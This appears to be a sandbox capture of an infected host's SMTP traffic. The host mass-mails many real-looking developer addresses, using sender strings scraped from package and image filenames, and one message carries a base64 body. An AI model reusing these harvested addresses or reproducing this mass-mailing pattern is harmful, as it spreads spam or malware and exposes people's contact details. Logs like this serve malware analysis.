                                                                                                                                                                                                          Dec 4, 2023 12:59:48.735157967 CET2549757142.251.16.27192.168.2.4250-mx.google.com at your service, [102.165.48.83]
                                                                                                                                                                                                          250-SIZE 157286400
                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                          250-ENHANCEDSTATUSCODES
                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                          250-CHUNKING
                                                                                                                                                                                                          250 SMTPUTF8
                                                                                                                                                                                                          Dec 4, 2023 12:59:48.750746965 CET4975725192.168.2.4142.251.16.27MAIL FROM: <react-focus@8.8.29>
                                                                                                                                                                                                          Dec 4, 2023 12:59:48.858560085 CET2549757142.251.16.27192.168.2.4250 2.1.0 OK x9-20020a05620a258900b0077dc4c03144si9873936qko.37 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:48.866004944 CET4975725192.168.2.4142.251.16.27RCPT TO: <purecatamphetamine@gmail.com>
                                                                                                                                                                                                          Dec 4, 2023 12:59:49.174068928 CET2549757142.251.16.27192.168.2.4250 2.1.5 OK x9-20020a05620a258900b0077dc4c03144si9873936qko.37 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:49.182020903 CET4975725192.168.2.4142.251.16.27DATA
                                                                                                                                                                                                          Dec 4, 2023 12:59:49.289752960 CET2549757142.251.16.27192.168.2.4354 Go ahead x9-20020a05620a258900b0077dc4c03144si9873936qko.37 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:51.473103046 CET2549754142.251.16.27192.168.2.4550-5.7.1 [102.165.48.83] Messages missing a valid Message-ID header are not
                                                                                                                                                                                                          550-5.7.1 accepted. Please visit
                                                                                                                                                                                                          550-5.7.1 https://support.google.com/mail/?p=RfcMessageNonCompliant and review
                                                                                                                                                                                                          550 5.7.1 RFC 5322 specifications for more information. ay18-20020a05622a229200b00423a394ff59si9707179qtb.677 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:51.745971918 CET2549755142.251.16.27192.168.2.4550-5.7.1 [102.165.48.83] Messages missing a valid Message-ID header are not
                                                                                                                                                                                                          550-5.7.1 accepted. Please visit
                                                                                                                                                                                                          550-5.7.1 https://support.google.com/mail/?p=RfcMessageNonCompliant and review
                                                                                                                                                                                                          550 5.7.1 RFC 5322 specifications for more information. t16-20020a0cef10000000b0067a9b65fe58si6831745qvr.138 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:51.750886917 CET2549753142.251.16.27192.168.2.4550-5.7.1 [102.165.48.83] Messages missing a valid Message-ID header are not
                                                                                                                                                                                                          550-5.7.1 accepted. Please visit
                                                                                                                                                                                                          550-5.7.1 https://support.google.com/mail/?p=RfcMessageNonCompliant and review
                                                                                                                                                                                                          550 5.7.1 RFC 5322 specifications for more information. bz22-20020a05622a1e9600b0041985eb503csi9466275qtb.693 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:52.123889923 CET2549757142.251.16.27192.168.2.4550-5.7.1 [102.165.48.83] Messages missing a valid Message-ID header are not
                                                                                                                                                                                                          550-5.7.1 accepted. Please visit
                                                                                                                                                                                                          550-5.7.1 https://support.google.com/mail/?p=RfcMessageNonCompliant and review
                                                                                                                                                                                                          550 5.7.1 RFC 5322 specifications for more information. x9-20020a05620a258900b0077dc4c03144si9873936qko.37 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.198801994 CET2549758142.251.16.27192.168.2.4220 mx.google.com ESMTP b16-20020a05620a04f000b0077f03b587d5si3926262qkh.533 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.201497078 CET4975825192.168.2.4142.251.16.27EHLO gmail.com
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.239578009 CET2549759142.251.16.27192.168.2.4220 mx.google.com ESMTP ee26-20020a05620a801a00b0076f18ad2e65si10110067qkb.520 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.241192102 CET4975925192.168.2.4142.251.16.27EHLO gmail.com
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.318008900 CET2549758142.251.16.27192.168.2.4250-mx.google.com at your service, [102.165.48.83]
                                                                                                                                                                                                          250-SIZE 157286400
                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                          250-ENHANCEDSTATUSCODES
                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                          250-CHUNKING
                                                                                                                                                                                                          250 SMTPUTF8
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.322616100 CET4975825192.168.2.4142.251.16.27MAIL FROM: <sdx-cardview-caret-rtl@2x.png>
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.351619005 CET2549759142.251.16.27192.168.2.4250-mx.google.com at your service, [102.165.48.83]
                                                                                                                                                                                                          250-SIZE 157286400
                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                          250-ENHANCEDSTATUSCODES
                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                          250-CHUNKING
                                                                                                                                                                                                          250 SMTPUTF8
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.354509115 CET4975925192.168.2.4142.251.16.27MAIL FROM: <freetype@nongnu.org>
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.364473104 CET2549760142.251.167.26192.168.2.4220 mx.google.com ESMTP t14-20020a056214154e00b0067a98bd3e78si7179389qvw.610 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.366926908 CET4976025192.168.2.4142.251.167.26EHLO cryptsoft.com
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.435753107 CET2549758142.251.16.27192.168.2.4250 2.1.0 OK b16-20020a05620a04f000b0077f03b587d5si3926262qkh.533 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.437804937 CET4975825192.168.2.4142.251.16.27RCPT TO: <zalmoxisus@gmail.com>
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.446549892 CET2549761142.251.167.26192.168.2.4220 mx.google.com ESMTP v19-20020a05622a189300b004237b45a899si10143358qtc.383 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.449822903 CET4976125192.168.2.4142.251.167.26EHLO cryptsoft.com
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.463989019 CET2549759142.251.16.27192.168.2.4250 2.1.0 OK ee26-20020a05620a801a00b0076f18ad2e65si10110067qkb.520 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.466202021 CET4975925192.168.2.4142.251.16.27RCPT TO: <cohara87@gmail.com>
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.506169081 CET2549760142.251.167.26192.168.2.4250-mx.google.com at your service, [102.165.48.83]
                                                                                                                                                                                                          250-SIZE 157286400
                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                          250-ENHANCEDSTATUSCODES
                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                          250-CHUNKING
                                                                                                                                                                                                          250 SMTPUTF8
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.509021997 CET4976025192.168.2.4142.251.167.26MAIL FROM: <sdx-cardview-backarrow@3x.png>
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.586384058 CET2549761142.251.167.26192.168.2.4250-mx.google.com at your service, [102.165.48.83]
                                                                                                                                                                                                          250-SIZE 157286400
                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                          250-ENHANCEDSTATUSCODES
                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                          250-CHUNKING
                                                                                                                                                                                                          250 SMTPUTF8
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.590786934 CET4976125192.168.2.4142.251.167.26MAIL FROM: <ifaaan@gmail.com>
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.639188051 CET2549759142.251.16.27192.168.2.4250 2.1.5 OK ee26-20020a05620a801a00b0076f18ad2e65si10110067qkb.520 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.641617060 CET4975925192.168.2.4142.251.16.27DATA
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.646032095 CET2549760142.251.167.26192.168.2.4250 2.1.0 OK t14-20020a056214154e00b0067a98bd3e78si7179389qvw.610 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.647483110 CET4976025192.168.2.4142.251.167.26RCPT TO: <eay@cryptsoft.com>
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.676078081 CET2549758142.251.16.27192.168.2.4250 2.1.5 OK b16-20020a05620a04f000b0077f03b587d5si3926262qkh.533 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.680376053 CET4975825192.168.2.4142.251.16.27DATA
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.725625992 CET2549761142.251.167.26192.168.2.4250 2.1.0 OK v19-20020a05622a189300b004237b45a899si10143358qtc.383 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.729404926 CET4976125192.168.2.4142.251.167.26RCPT TO: <tjh@cryptsoft.com>
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.749362946 CET2549759142.251.16.27192.168.2.4354 Go ahead ee26-20020a05620a801a00b0076f18ad2e65si10110067qkb.520 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.793440104 CET2549758142.251.16.27192.168.2.4354 Go ahead b16-20020a05620a04f000b0077f03b587d5si3926262qkh.533 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.806639910 CET2549760142.251.167.26192.168.2.4550-5.1.1 The email account that you tried to reach does not exist. Please try
                                                                                                                                                                                                          550-5.1.1 double-checking the recipient's email address for typos or
                                                                                                                                                                                                          550-5.1.1 unnecessary spaces. Learn more at
                                                                                                                                                                                                          550 5.1.1 https://support.google.com/mail/?p=NoSuchUser t14-20020a056214154e00b0067a98bd3e78si7179389qvw.610 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.909638882 CET2549761142.251.167.26192.168.2.4250 2.1.5 OK v19-20020a05622a189300b004237b45a899si10143358qtc.383 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.919334888 CET4976125192.168.2.4142.251.167.26DATA
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.055186987 CET2549761142.251.167.26192.168.2.4354 Go ahead v19-20020a05622a189300b004237b45a899si10143358qtc.383 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.162455082 CET4975925192.168.2.4142.251.16.279454S7U4qhd02tswVOhJTdKh3rLCCVoZFirMm36m2g1EHzVokS9NBpqYyHOf5lR+W1
                                                                                                                                                                                                          EVRqF30RGqdjxkzgOZaEu4/Td4KcqQcULjZm94BMT5sW1whD6F1sqhBasgiHjf+Jb2Xtqai5
                                                                                                                                                                                                          9hTlbvdXcUnJ3piUkP8qbIZ2/IS0Av25ymKmI3k6PKkpMGRehCnpJ3dkdTe6l6yupRA8sxkW
                                                                                                                                                                                                          CSm+8xeyP31KqisRUpqpcnBHypbvRWNAxYxCsNiQi8VoxYu3XStxo2q4CK39J8ksTFW/qPqm
                                                                                                                                                                                                          7IK/Be8VrjUCcsDEQyl/vmxEnVQMmulQSAolYHeRcv7CGAt5AvrfJXUEvQgOKfuDeYQK9oQY
                                                                                                                                                                                                          GvxhmrPoJhKZECvDiyDfeaMaj108lICPCynBBifAM88CU8y0Yfde5B+4CPlP11m26lchekOJ
                                                                                                                                                                                                          Q7oNqqrvAE6nw6nk2NjAey78UqsJ+O6v3W9tfswv8UqIaj/8+u5lwmtZfrdcbpKlK3qEt4t2
                                                                                                                                                                                                          DrKhxEGsrqz6naiKwGmxQ8DihByg28sL6hUuFkf9VMzlBvSemJxixE8FJg2I7nR2KooA+HsV
                                                                                                                                                                                                          9TQW9zMFH/TkOG71jIroYnUHAGqw4aHEV4zamtVJ2yTTyJbhBS7Gcf8XqL9X5JDGuTz1oJBS
                                                                                                                                                                                                          jjov2iQYRS7kp8yInZfg3YKOQAc57ccdJ1QbjJBZCIie9UST8iGYdtkAhRTNA8YZGAjzLkT4
                                                                                                                                                                                                          IyL9IBHyLQiHWoSEQlch8WwQ7nGI63ZE0EsixVh3pKY2iUasq8K6Ssar2pPOM314OvtdOpjp
                                                                                                                                                                                                          RQdJ6y8RPFWighCZ3SkDvDgt3oWMrtCEyMu/KXSIyLuHMH0K+gMG06gV7zV+Us8GmDr9Vl86
                                                                                                                                                                                                          z0XLxBBmx8eaVSMSscEkdwRwBHMAjIII/mPazIDNhTG5B
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.390388966 CET2549758142.251.16.27192.168.2.4550-5.7.1 [102.165.48.83] Messages missing a valid Message-ID header are not
                                                                                                                                                                                                          550-5.7.1 accepted. Please visit
                                                                                                                                                                                                          550-5.7.1 https://support.google.com/mail/?p=RfcMessageNonCompliant and review
                                                                                                                                                                                                          550 5.7.1 RFC 5322 specifications for more information. b16-20020a05620a04f000b0077f03b587d5si3926262qkh.533 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.463430882 CET2549759142.251.16.27192.168.2.4550-5.7.1 [102.165.48.83] Messages missing a valid Message-ID header are not
                                                                                                                                                                                                          550-5.7.1 accepted. Please visit
                                                                                                                                                                                                          550-5.7.1 https://support.google.com/mail/?p=RfcMessageNonCompliant and review
                                                                                                                                                                                                          550 5.7.1 RFC 5322 specifications for more information. ee26-20020a05620a801a00b0076f18ad2e65si10110067qkb.520 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.597615957 CET2549761142.251.167.26192.168.2.4550-5.7.1 [102.165.48.83] Messages missing a valid Message-ID header are not
                                                                                                                                                                                                          550-5.7.1 accepted. Please visit
                                                                                                                                                                                                          550-5.7.1 https://support.google.com/mail/?p=RfcMessageNonCompliant and review
                                                                                                                                                                                                          550 5.7.1 RFC 5322 specifications for more information. v19-20020a05622a189300b004237b45a899si10143358qtc.383 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.972332001 CET2549762142.251.16.27192.168.2.4220 mx.google.com ESMTP o19-20020a05620a2a1300b0077da5e2ff28si10015239qkp.289 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.972560883 CET4976225192.168.2.4142.251.16.27EHLO gmail.com
                                                                                                                                                                                                          Dec 4, 2023 13:00:05.059911013 CET2549763142.251.167.26192.168.2.4220 mx.google.com ESMTP y14-20020a0cec0e000000b0067aa7622a49si5395711qvo.603 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 13:00:05.060154915 CET4976325192.168.2.4142.251.167.26EHLO tootallnate.net
                                                                                                                                                                                                          Dec 4, 2023 13:00:05.088624001 CET2549762142.251.16.27192.168.2.4250-mx.google.com at your service, [102.165.48.83]
                                                                                                                                                                                                          250-SIZE 157286400
                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                          250-ENHANCEDSTATUSCODES
                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                          250-CHUNKING
                                                                                                                                                                                                          250 SMTPUTF8
                                                                                                                                                                                                          Dec 4, 2023 13:00:05.088941097 CET4976225192.168.2.4142.251.16.27MAIL FROM: <purecatamphetamine@gmail.com>
                                                                                                                                                                                                          Dec 4, 2023 13:00:05.138423920 CET2549764142.251.167.26192.168.2.4220 mx.google.com ESMTP q5-20020a05621419e500b0067abc8d7e5fsi3258151qvc.221 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 13:00:05.138652086 CET4976425192.168.2.4142.251.167.26EHLO luiscouto.pt
                                                                                                                                                                                                          Dec 4, 2023 13:00:05.206497908 CET2549762142.251.16.27192.168.2.4250 2.1.0 OK o19-20020a05620a2a1300b0077da5e2ff28si10015239qkp.289 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 13:00:05.206712008 CET4976225192.168.2.4142.251.16.27RCPT TO: <sebmck@gmail.com>
                                                                                                                                                                                                          Dec 4, 2023 13:00:05.254374981 CET2549765162.255.118.51192.168.2.4220-asp-relay.et.namecheap.tech ESMTP Postfix
                                                                                                                                                                                                          Dec 4, 2023 13:00:05.545665979 CET2549762142.251.16.27192.168.2.4250 2.1.5 OK o19-20020a05620a2a1300b0077da5e2ff28si10015239qkp.289 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 13:00:05.547851086 CET4976225192.168.2.4142.251.16.27DATA
                                                                                                                                                                                                          Dec 4, 2023 13:00:05.665740967 CET2549762142.251.16.27192.168.2.4354 Go ahead o19-20020a05620a2a1300b0077da5e2ff28si10015239qkp.289 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 13:00:05.938028097 CET2549762142.251.16.27192.168.2.4550-5.7.1 [102.165.48.83] Messages missing a valid Message-ID header are not
                                                                                                                                                                                                          550-5.7.1 accepted. Please visit
                                                                                                                                                                                                          550-5.7.1 https://support.google.com/mail/?p=RfcMessageNonCompliant and review
                                                                                                                                                                                                          550 5.7.1 RFC 5322 specifications for more information. o19-20020a05620a2a1300b0077da5e2ff28si10015239qkp.289 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.190577984 CET2549763142.251.167.26192.168.2.4250-mx.google.com at your service, [102.165.48.83]
                                                                                                                                                                                                          250-SIZE 157286400
                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                          250-ENHANCEDSTATUSCODES
                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                          250-CHUNKING
                                                                                                                                                                                                          250 SMTPUTF8
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.191442013 CET4976325192.168.2.4142.251.167.26MAIL FROM: <tjh@cryptsoft.com>
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.268693924 CET2549764142.251.167.26192.168.2.4250-mx.google.com at your service, [102.165.48.83]
                                                                                                                                                                                                          250-SIZE 157286400
                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                          250-ENHANCEDSTATUSCODES
                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                          250-CHUNKING
                                                                                                                                                                                                          250 SMTPUTF8
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.269009113 CET4976425192.168.2.4142.251.167.26MAIL FROM: <npm/prop-types@15.7.2>
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.321391106 CET2549763142.251.167.26192.168.2.4250 2.1.0 OK y14-20020a0cec0e000000b0067aa7622a49si5395711qvo.603 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.321599007 CET4976325192.168.2.4142.251.167.26RCPT TO: <nathan@tootallnate.net>
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.398613930 CET2549764142.251.167.26192.168.2.4250 2.1.0 OK q5-20020a05621419e500b0067abc8d7e5fsi3258151qvc.221 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.398808956 CET4976425192.168.2.4142.251.167.26RCPT TO: <hello@luiscouto.pt>
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.578844070 CET2549763142.251.167.26192.168.2.4250 2.1.5 OK y14-20020a0cec0e000000b0067aa7622a49si5395711qvo.603 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.579165936 CET4976325192.168.2.4142.251.167.26DATA
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.679722071 CET2549764142.251.167.26192.168.2.4250 2.1.5 OK q5-20020a05621419e500b0067abc8d7e5fsi3258151qvc.221 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.682684898 CET4976425192.168.2.4142.251.167.26DATA
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.709523916 CET2549763142.251.167.26192.168.2.4354 Go ahead y14-20020a0cec0e000000b0067aa7622a49si5395711qvo.603 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.812005997 CET2549764142.251.167.26192.168.2.4354 Go ahead q5-20020a05621419e500b0067abc8d7e5fsi3258151qvc.221 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 13:00:07.176740885 CET2549764142.251.167.26192.168.2.4550-5.7.1 [102.165.48.83] Gmail has detected that this message is not RFC 5322
                                                                                                                                                                                                          550-5.7.1 compliant:
                                                                                                                                                                                                          550-5.7.1 'From' header has non compliant domain name.
                                                                                                                                                                                                          550-5.7.1 To reduce the amount of spam sent to Gmail, this message has been
                                                                                                                                                                                                          550-5.7.1 blocked. Please visit
                                                                                                                                                                                                          550-5.7.1 https://support.google.com/mail/?p=RfcMessageNonCompliant and review
                                                                                                                                                                                                          550 5.7.1 RFC 5322 specifications for more information. q5-20020a05621419e500b0067abc8d7e5fsi3258151qvc.221 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 13:00:07.274255037 CET2549763142.251.167.26192.168.2.4550-5.7.1 [102.165.48.83] Messages missing a valid Message-ID header are not
                                                                                                                                                                                                          550-5.7.1 accepted. Please visit
                                                                                                                                                                                                          550-5.7.1 https://support.google.com/mail/?p=RfcMessageNonCompliant and review
                                                                                                                                                                                                          550 5.7.1 RFC 5322 specifications for more information. y14-20020a0cec0e000000b0067aa7622a49si5395711qvo.603 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 13:00:08.149826050 CET2549765162.255.118.51192.168.2.4220 asp-relay.et.namecheap.tech ESMTP Postfix
                                                                                                                                                                                                          Dec 4, 2023 13:00:08.150037050 CET4976525192.168.2.4162.255.118.51EHLO cloudhead.net
                                                                                                                                                                                                          Dec 4, 2023 13:00:08.317850113 CET2549765162.255.118.51192.168.2.4250-asp-relay.et.namecheap.tech
                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                          250-SIZE 20971520
                                                                                                                                                                                                          250-ETRN
                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                          250-ENHANCEDSTATUSCODES
                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                          250 CHUNKING
                                                                                                                                                                                                          Dec 4, 2023 13:00:08.318186998 CET4976525192.168.2.4162.255.118.51MAIL FROM: <sdx-cardview-overflow-dark@4x.png>
                                                                                                                                                                                                          Dec 4, 2023 13:00:08.487663984 CET2549765162.255.118.51192.168.2.4250 2.1.0 Ok
                                                                                                                                                                                                          Dec 4, 2023 13:00:08.487778902 CET4976525192.168.2.4162.255.118.51RCPT TO: <self@cloudhead.net>
                                                                                                                                                                                                          Dec 4, 2023 13:00:08.710100889 CET2549765162.255.118.51192.168.2.4554 5.1.8 <sdx-cardview-overflow-dark@4x.png>: Sender address rejected: Domain not found
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.647171974 CET2549766142.251.167.26192.168.2.4220 mx.google.com ESMTP gi4-20020a056214248400b0067ac4b8a125si2628884qvb.39 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.652316093 CET4976625192.168.2.4142.251.167.26EHLO thejameskyle.com
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.833717108 CET2549766142.251.167.26192.168.2.4250-mx.google.com at your service, [102.165.48.83]
                                                                                                                                                                                                          250-SIZE 157286400
                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                          250-ENHANCEDSTATUSCODES
                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                          250-CHUNKING
                                                                                                                                                                                                          250 SMTPUTF8
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.834455013 CET4976625192.168.2.4142.251.167.26MAIL FROM: <hoist-non-react-statics@3.3.2>
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.837546110 CET2549767142.251.16.27192.168.2.4220 mx.google.com ESMTP fe15-20020a05622a4d4f00b004254a3cdd6dsi4358025qtb.234 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.838408947 CET4976725192.168.2.4142.251.16.27EHLO gmail.com
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.948767900 CET2549767142.251.16.27192.168.2.4250-mx.google.com at your service, [102.165.48.83]
                                                                                                                                                                                                          250-SIZE 157286400
                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                          250-ENHANCEDSTATUSCODES
                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                          250-CHUNKING
                                                                                                                                                                                                          250 SMTPUTF8
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.953980923 CET2549768142.251.16.27192.168.2.4220 mx.google.com ESMTP i21-20020a05620a145500b0077d7d37d036si8779639qkl.687 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.964297056 CET2549766142.251.167.26192.168.2.4250 2.1.0 OK gi4-20020a056214248400b0067ac4b8a125si2628884qvb.39 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 13:00:14.947715998 CET4976825192.168.2.4142.251.16.27EHLO gmail.com
                                                                                                                                                                                                          Dec 4, 2023 13:00:14.947719097 CET4976725192.168.2.4142.251.16.27MAIL FROM: <sdx-cardview-caret@2x.png>
                                                                                                                                                                                                          Dec 4, 2023 13:00:14.947865009 CET4976625192.168.2.4142.251.167.26RCPT TO: <me@thejameskyle.com>
                                                                                                                                                                                                          Dec 4, 2023 13:00:15.055351019 CET2549767142.251.16.27192.168.2.4250 2.1.0 OK fe15-20020a05622a4d4f00b004254a3cdd6dsi4358025qtb.234 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 13:00:15.055614948 CET4976725192.168.2.4142.251.16.27RCPT TO: <kpdecker@gmail.com>
                                                                                                                                                                                                          Dec 4, 2023 13:00:15.058969021 CET2549768142.251.16.27192.168.2.4250-mx.google.com at your service, [102.165.48.83]
                                                                                                                                                                                                          250-SIZE 157286400
                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                          250-ENHANCEDSTATUSCODES
                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                          250-CHUNKING
                                                                                                                                                                                                          250 SMTPUTF8
                                                                                                                                                                                                          Dec 4, 2023 13:00:15.059290886 CET4976825192.168.2.4142.251.16.27MAIL FROM: <react-window-provider@2.2.15>
                                                                                                                                                                                                          Dec 4, 2023 13:00:15.167443991 CET2549768142.251.16.27192.168.2.4250 2.1.0 OK i21-20020a05620a145500b0077d7d37d036si8779639qkl.687 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 13:00:15.167650938 CET4976825192.168.2.4142.251.16.27RCPT TO: <ifaaan@gmail.com>
                                                                                                                                                                                                          Dec 4, 2023 13:00:15.228240967 CET2549766142.251.167.26192.168.2.4250 2.1.5 OK gi4-20020a056214248400b0067ac4b8a125si2628884qvb.39 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 13:00:15.228471041 CET4976625192.168.2.4142.251.167.26DATA
                                                                                                                                                                                                          Dec 4, 2023 13:00:15.304883957 CET2549768142.251.16.27192.168.2.4250 2.1.5 OK i21-20020a05620a145500b0077d7d37d036si8779639qkl.687 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 13:00:15.305094004 CET4976825192.168.2.4142.251.16.27DATA
                                                                                                                                                                                                          Dec 4, 2023 13:00:15.314003944 CET2549767142.251.16.27192.168.2.4250 2.1.5 OK fe15-20020a05622a4d4f00b004254a3cdd6dsi4358025qtb.234 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 13:00:15.314204931 CET4976725192.168.2.4142.251.16.27DATA
                                                                                                                                                                                                          Dec 4, 2023 13:00:15.358448982 CET2549766142.251.167.26192.168.2.4354 Go ahead gi4-20020a056214248400b0067ac4b8a125si2628884qvb.39 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 13:00:15.393922091 CET254976966.196.36.12192.168.2.4220 kryten.reg.ca ESMTP Exim 4.95 Ubuntu Mon, 04 Dec 2023 04:00:15 -0800
                                                                                                                                                                                                          Dec 4, 2023 13:00:15.394141912 CET4976925192.168.2.466.196.36.12EHLO vision-media.ca
                                                                                                                                                                                                          Dec 4, 2023 13:00:15.413059950 CET2549768142.251.16.27192.168.2.4354 Go ahead i21-20020a05620a145500b0077d7d37d036si8779639qkl.687 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 13:00:15.421884060 CET2549767142.251.16.27192.168.2.4354 Go ahead fe15-20020a05622a4d4f00b004254a3cdd6dsi4358025qtb.234 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 13:00:15.557024002 CET254976966.196.36.12192.168.2.4250-kryten.reg.ca Hello vision-media.ca [102.165.48.83]
                                                                                                                                                                                                          250-SIZE 52428800
                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                          250-PIPE_CONNECT
                                                                                                                                                                                                          250-CHUNKING
                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                          250-PRDR
                                                                                                                                                                                                          250 HELP
                                                                                                                                                                                                          Dec 4, 2023 13:00:15.557511091 CET4976925192.168.2.466.196.36.12MAIL FROM: <sdx-cardview-caret-rtl@2x.png>
                                                                                                                                                                                                          Dec 4, 2023 13:00:15.719779968 CET254976966.196.36.12192.168.2.4250 OK
                                                                                                                                                                                                          Dec 4, 2023 13:00:15.721424103 CET4976925192.168.2.466.196.36.12RCPT TO: <tj@vision-media.ca>
                                                                                                                                                                                                          Dec 4, 2023 13:00:15.747601032 CET2549768142.251.16.27192.168.2.4550-5.7.1 [102.165.48.83] Messages missing a valid Message-ID header are not
                                                                                                                                                                                                          550-5.7.1 accepted. Please visit
                                                                                                                                                                                                          550-5.7.1 https://support.google.com/mail/?p=RfcMessageNonCompliant and review
